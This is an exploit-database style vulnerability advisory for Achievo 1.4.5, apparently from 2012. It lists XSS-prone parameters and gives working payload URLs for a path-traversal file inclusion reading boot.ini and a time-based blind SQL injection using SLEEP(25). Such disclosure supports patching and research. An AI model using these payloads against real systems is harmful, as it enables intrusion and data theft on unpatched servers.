vendor:
Achievo
by:
Canberk Bolat
9
CVSS
CRITICAL
Cross-Site Scripting, Local File Inclusion and SQL Injection
N/A
CWE
Product Name: Achievo
Affected Version From: 1.4.5
Affected Version To: 1.4.5
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012
XSS, LFI and SQL Injection Vulnerabilities in Achievo
Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in version 1.4.5. XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid, atkselector, atkfilter, searchString) LFI: http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3 SQL Injection: http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
Mitigation:
N/A